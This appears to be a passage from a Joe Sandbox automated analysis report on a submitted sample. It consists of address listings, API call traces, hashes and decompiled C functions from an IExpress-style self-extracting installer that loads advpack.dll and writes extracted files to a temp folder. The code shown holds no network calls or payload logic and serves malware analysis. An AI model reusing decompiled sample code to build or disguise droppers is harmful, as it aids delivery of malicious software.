                                                                                                                                                                                                                                      0x004038b5
                                                                                                                                                                                                                                      0x004038cc
                                                                                                                                                                                                                                      0x004038ce
                                                                                                                                                                                                                                      0x004038ce
                                                                                                                                                                                                                                      0x00403969
                                                                                                                                                                                                                                      0x0040396b
                                                                                                                                                                                                                                      0x00403997
                                                                                                                                                                                                                                      0x0040396d
                                                                                                                                                                                                                                      0x00403970
                                                                                                                                                                                                                                      0x00403979
                                                                                                                                                                                                                                      0x0040397b
                                                                                                                                                                                                                                      0x0040397d
                                                                                                                                                                                                                                      0x0040398d
                                                                                                                                                                                                                                      0x0040398f
                                                                                                                                                                                                                                      0x0040397f
                                                                                                                                                                                                                                      0x0040397f
                                                                                                                                                                                                                                      0x0040397f
                                                                                                                                                                                                                                      0x0040397d
                                                                                                                                                                                                                                      0x0040399d
                                                                                                                                                                                                                                      0x004039a4
                                                                                                                                                                                                                                      0x004039fd
                                                                                                                                                                                                                                      0x004039fd
                                                                                                                                                                                                                                      0x004039ff
                                                                                                                                                                                                                                      0x00403a01
                                                                                                                                                                                                                                      0x00403a07
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004039a6
                                                                                                                                                                                                                                      0x004039a6
                                                                                                                                                                                                                                      0x004039a8
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004039aa
                                                                                                                                                                                                                                      0x004039ad
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004039b1
                                                                                                                                                                                                                                      0x004039b7
                                                                                                                                                                                                                                      0x004039bc
                                                                                                                                                                                                                                      0x004039be
                                                                                                                                                                                                                                      0x004039d1
                                                                                                                                                                                                                                      0x004039d3
                                                                                                                                                                                                                                      0x004039d4
                                                                                                                                                                                                                                      0x004039df
                                                                                                                                                                                                                                      0x004039e5
                                                                                                                                                                                                                                      0x004039e8
                                                                                                                                                                                                                                      0x004039ef
                                                                                                                                                                                                                                      0x004039f2
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004039f4
                                                                                                                                                                                                                                      0x004039f7
                                                                                                                                                                                                                                      0x004039f7
                                                                                                                                                                                                                                      0x004039f9
                                                                                                                                                                                                                                      0x004039f9
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004039f7
                                                                                                                                                                                                                                      0x004039ea
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004039ea
                                                                                                                                                                                                                                      0x004039c1
                                                                                                                                                                                                                                      0x004039c6
                                                                                                                                                                                                                                      0x004039c8
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004039ca
                                                                                                                                                                                                                                      0x004039a4
                                                                                                                                                                                                                                      0x00403943
                                                                                                                                                                                                                                      0x00403949
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040394f
                                                                                                                                                                                                                                      0x00403951
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403957
                                                                                                                                                                                                                                      0x00403957
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403957
                                                                                                                                                                                                                                      0x00403903
                                                                                                                                                                                                                                      0x00403903
                                                                                                                                                                                                                                      0x00403909
                                                                                                                                                                                                                                      0x0040390d
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040391b
                                                                                                                                                                                                                                      0x00403921
                                                                                                                                                                                                                                      0x00403926
                                                                                                                                                                                                                                      0x00403928
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040392e
                                                                                                                                                                                                                                      0x00403934
                                                                                                                                                                                                                                      0x00403939
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403939
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004038e0
                                                                                                                                                                                                                                      0x00403831
                                                                                                                                                                                                                                      0x00403833
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403839
                                                                                                                                                                                                                                      0x0040383b
                                                                                                                                                                                                                                      0x00403871
                                                                                                                                                                                                                                      0x00403873
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403888
                                                                                                                                                                                                                                      0x0040388c
                                                                                                                                                                                                                                      0x0040388c
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040388e
                                                                                                                                                                                                                                      0x0040388e
                                                                                                                                                                                                                                      0x00403890
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403892
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403892
                                                                                                                                                                                                                                      0x0040383d
                                                                                                                                                                                                                                      0x0040383f
                                                                                                                                                                                                                                      0x00403845
                                                                                                                                                                                                                                      0x0040385c
                                                                                                                                                                                                                                      0x00403865
                                                                                                                                                                                                                                      0x00403869
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040386f
                                                                                                                                                                                                                                      0x00403847
                                                                                                                                                                                                                                      0x0040384a
                                                                                                                                                                                                                                      0x00403850
                                                                                                                                                                                                                                      0x00403854
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403856
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004038e2
                                                                                                                                                                                                                                      0x004038e2
                                                                                                                                                                                                                                      0x004038e3
                                                                                                                                                                                                                                      0x004038e9
                                                                                                                                                                                                                                      0x004038ef
                                                                                                                                                                                                                                      0x004038ef
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004038f8
                                                                                                                                                                                                                                      0x00403739
                                                                                                                                                                                                                                      0x0040373c
                                                                                                                                                                                                                                      0x0040374a
                                                                                                                                                                                                                                      0x00403752
                                                                                                                                                                                                                                      0x00403757
                                                                                                                                                                                                                                      0x0040375c
                                                                                                                                                                                                                                      0x0040375f
                                                                                                                                                                                                                                      0x0040378a
                                                                                                                                                                                                                                      0x0040378d
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403791
                                                                                                                                                                                                                                      0x00403792
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403792
                                                                                                                                                                                                                                      0x00403761
                                                                                                                                                                                                                                      0x00403765
                                                                                                                                                                                                                                      0x00403766
                                                                                                                                                                                                                                      0x0040376d
                                                                                                                                                                                                                                      0x0040376f
                                                                                                                                                                                                                                      0x0040377c
                                                                                                                                                                                                                                      0x0040377c
                                                                                                                                                                                                                                      0x00403782
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403782
                                                                                                                                                                                                                                      0x00403771
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403773
                                                                                                                                                                                                                                      0x0040377a
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040377a
                                                                                                                                                                                                                                      0x0040373e
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040371b
                                                                                                                                                                                                                                      0x0040371b
                                                                                                                                                                                                                                      0x00403959
                                                                                                                                                                                                                                      0x00403959
                                                                                                                                                                                                                                      0x0040395a
                                                                                                                                                                                                                                      0x0040395c
                                                                                                                                                                                                                                      0x0040395d
                                                                                                                                                                                                                                      0x00403a0c
                                                                                                                                                                                                                                      0x00403a0c
                                                                                                                                                                                                                                      0x00403a10
                                                                                                                                                                                                                                      0x00403a15
                                                                                                                                                                                                                                      0x00403a2a
                                                                                                                                                                                                                                      0x00403a2a

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00403711
                                                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 004039B1
                                                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,00000000,OxZQ,00000030), ref: 004039DF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$BeepVersion
                                                                                                                                                                                                                                      • String ID: 3$OxZQ
                                                                                                                                                                                                                                      • API String ID: 2519184315-3267426395
                                                                                                                                                                                                                                      • Opcode ID: a73c02065d68ccdedbfa3edbd736adde1a34aceb3b92ca9356f0371454ab9c71
                                                                                                                                                                                                                                      • Instruction ID: 80d418a18f9ca63056d2a7f1cfecbac9e4705bd0617006d1ca44800478078512
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a73c02065d68ccdedbfa3edbd736adde1a34aceb3b92ca9356f0371454ab9c71
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7891E8B1F012149FDB349F14CD817AA7BA8AB85306F1540BBD989BB2D1D7788E81CF49
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                                                                                                      			E00406443(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                                                      				signed char _t14;
                                                                                                                                                                                                                                      				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                                                      				CHAR* _t26;
                                                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t27 = __esi;
                                                                                                                                                                                                                                      				_t18 = __ebx;
                                                                                                                                                                                                                                      				_t9 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                                                      				E004017A1( &_v268, 0x104, __ecx, "C:\Users\Arthur\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                      				_t26 = "advpack.dll";
                                                                                                                                                                                                                                      				E00406534( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                      				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                      				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                      					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return E00406C80(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                      			}













                                                                                                                                                                                                                                      0x00406443
                                                                                                                                                                                                                                      0x00406443
                                                                                                                                                                                                                                      0x0040644e
                                                                                                                                                                                                                                      0x00406455
                                                                                                                                                                                                                                      0x00406459
                                                                                                                                                                                                                                      0x0040646b
                                                                                                                                                                                                                                      0x00406470
                                                                                                                                                                                                                                      0x00406481
                                                                                                                                                                                                                                      0x0040648d
                                                                                                                                                                                                                                      0x00406496
                                                                                                                                                                                                                                      0x004064b0
                                                                                                                                                                                                                                      0x0040649c
                                                                                                                                                                                                                                      0x004064a7
                                                                                                                                                                                                                                      0x004064a7
                                                                                                                                                                                                                                      0x004064c2

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 0040648D
                                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 004064A7
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 004064B0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                                                      • API String ID: 438848745-3594766426
                                                                                                                                                                                                                                      • Opcode ID: fbff98475206b4e097318c1718504c7f8ae19963b709641e7137cec3f86b55d9
                                                                                                                                                                                                                                      • Instruction ID: 9c5b0d7ddbac9d3037c2c174e0ce841756059058ea5cd3584bbacf61ef207e99
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbff98475206b4e097318c1718504c7f8ae19963b709641e7137cec3f86b55d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02F0F430A00208ABEB50DB25DD49FEE7378DB94314F91017AF586B21D0DFBC9D9A8A1D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 32%
                                                                                                                                                                                                                                      			E00404153(void* __eflags) {
                                                                                                                                                                                                                                      				int _t18;
                                                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t20 = E00404669("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                      				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                      				if(_t21 != 0) {
                                                                                                                                                                                                                                      					if(E00404669("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                      						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                                                      							return LocalFree(_t21);
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                                                      						_push(0x40);
                                                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                                                      						_push(_t21);
                                                                                                                                                                                                                                      						_t18 = 0x3e9;
                                                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                                                      						E00404495(0, _t18);
                                                                                                                                                                                                                                      						goto L7;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                                                      					_push(0x10);
                                                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                                                      					_t18 = 0x4b1;
                                                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return E00404495(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      			}





                                                                                                                                                                                                                                      0x00404167
                                                                                                                                                                                                                                      0x00404179
                                                                                                                                                                                                                                      0x0040417d
                                                                                                                                                                                                                                      0x004041a1
                                                                                                                                                                                                                                      0x004041bd
                                                                                                                                                                                                                                      0x004041d0
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004041d1
                                                                                                                                                                                                                                      0x004041bf
                                                                                                                                                                                                                                      0x004041c0
                                                                                                                                                                                                                                      0x004041c2
                                                                                                                                                                                                                                      0x004041c3
                                                                                                                                                                                                                                      0x004041c4
                                                                                                                                                                                                                                      0x004041c9
                                                                                                                                                                                                                                      0x004041cb
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004041cb
                                                                                                                                                                                                                                      0x004041a3
                                                                                                                                                                                                                                      0x004041a4
                                                                                                                                                                                                                                      0x004041a6
                                                                                                                                                                                                                                      0x004041a7
                                                                                                                                                                                                                                      0x004041a8
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004041a8
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 0040467A
                                                                                                                                                                                                                                        • Part of subcall function 00404669: SizeofResource.KERNEL32(00000000,00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00404683
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 0040469D
                                                                                                                                                                                                                                        • Part of subcall function 00404669: LoadResource.KERNEL32(00000000,00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A6
                                                                                                                                                                                                                                        • Part of subcall function 00404669: LockResource.KERNEL32(00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046AD
                                                                                                                                                                                                                                        • Part of subcall function 00404669: memcpy_s.MSVCRT ref: 004046BF
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046C9
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,004030A5), ref: 00404173
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,004030A5), ref: 004041D1
                                                                                                                                                                                                                                        • Part of subcall function 00404495: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004044F4
                                                                                                                                                                                                                                        • Part of subcall function 00404495: MessageBoxA.USER32(?,?,OxZQ,00010010), ref: 00404530
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                      • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                      • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                      • Opcode ID: 614fae5212cc2b4d6bfbe9399422230e987dd602f9813d0299487157ff0ae007
                                                                                                                                                                                                                                      • Instruction ID: fd92f2c62399b4e7defcffb36214f29a787b7cd12047082d25a4735d066ccd8a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 614fae5212cc2b4d6bfbe9399422230e987dd602f9813d0299487157ff0ae007
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A014BF13002147AF3251AA65C9AF7B618EDBD5798F10803BBB05BA2D09ABDDC11517D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                                                      			E00401A00(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v520;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                                                      				struct HWND__* _t34;
                                                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t33 = __edi;
                                                                                                                                                                                                                                      				_t27 = __ebx;
                                                                                                                                                                                                                                      				_t11 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                      				_t34 = _a4;
                                                                                                                                                                                                                                      				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                                                                      					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                      					E004043AE(_t34, _t15);
                                                                                                                                                                                                                                      					_v520 = 0;
                                                                                                                                                                                                                                      					LoadStringA( *0x409a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                      					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                      					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					if(_t14 != 1) {
                                                                                                                                                                                                                                      						L4:
                                                                                                                                                                                                                                      						_t23 = 0;
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						_t32 = _a12;
                                                                                                                                                                                                                                      						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                      							L6:
                                                                                                                                                                                                                                      							_t23 = 1;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return E00406C80(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                      			}













                                                                                                                                                                                                                                      0x00401a00
                                                                                                                                                                                                                                      0x00401a00
                                                                                                                                                                                                                                      0x00401a0b
                                                                                                                                                                                                                                      0x00401a12
                                                                                                                                                                                                                                      0x00401a19
                                                                                                                                                                                                                                      0x00401a1c
                                                                                                                                                                                                                                      0x00401a21
                                                                                                                                                                                                                                      0x00401a4a
                                                                                                                                                                                                                                      0x00401a4e
                                                                                                                                                                                                                                      0x00401a5e
                                                                                                                                                                                                                                      0x00401a6f
                                                                                                                                                                                                                                      0x00401a82
                                                                                                                                                                                                                                      0x00401a8a
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00401a23
                                                                                                                                                                                                                                      0x00401a26
                                                                                                                                                                                                                                      0x00401a40
                                                                                                                                                                                                                                      0x00401a40
                                                                                                                                                                                                                                      0x00401a28
                                                                                                                                                                                                                                      0x00401a28
                                                                                                                                                                                                                                      0x00401a34
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00401a36
                                                                                                                                                                                                                                      0x00401a38
                                                                                                                                                                                                                                      0x00401a90
                                                                                                                                                                                                                                      0x00401a92
                                                                                                                                                                                                                                      0x00401a92
                                                                                                                                                                                                                                      0x00401a34
                                                                                                                                                                                                                                      0x00401a26
                                                                                                                                                                                                                                      0x00401a9f

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00401A38
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00401A44
                                                                                                                                                                                                                                      • LoadStringA.USER32(?,?,00000200), ref: 00401A6F
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00401A82
                                                                                                                                                                                                                                      • MessageBeep.USER32(000000FF), ref: 00401A8A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1273765764-0
                                                                                                                                                                                                                                      • Opcode ID: 7ce507a3322927020380058fa92008fdf80389d62d8c0e4dc6d8e01ae36588bf
                                                                                                                                                                                                                                      • Instruction ID: dd71f220a5724b4b106c887bf927f63dc51c4cf7b01c5a2774437f204a92364e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ce507a3322927020380058fa92008fdf80389d62d8c0e4dc6d8e01ae36588bf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7311A131600219AFDB10EF64DE08AAE77B8EF49300F108175F616F61E1CA349E51DF9A
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                                                                                                      			E00406370(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                                                      				long _v272;
                                                                                                                                                                                                                                      				void* _v276;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                                                                      				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                                                      				signed int _t40;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t15 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                      				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                                                      				_v276 = _a16;
                                                                                                                                                                                                                                      				_t37 = 1;
                                                                                                                                                                                                                                      				E004017A1( &_v268, 0x104, __ecx, "C:\Users\Arthur\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                      				E00406534( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                      				_t28 = 0;
                                                                                                                                                                                                                                      				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                      				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                      					_t28 = _a4;
                                                                                                                                                                                                                                      					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                      						 *0x409124 = 0x80070052;
                                                                                                                                                                                                                                      						_t37 = 0;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					CloseHandle(_t39);
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					 *0x409124 = 0x80070052;
                                                                                                                                                                                                                                      					_t37 = 0;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return E00406C80(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
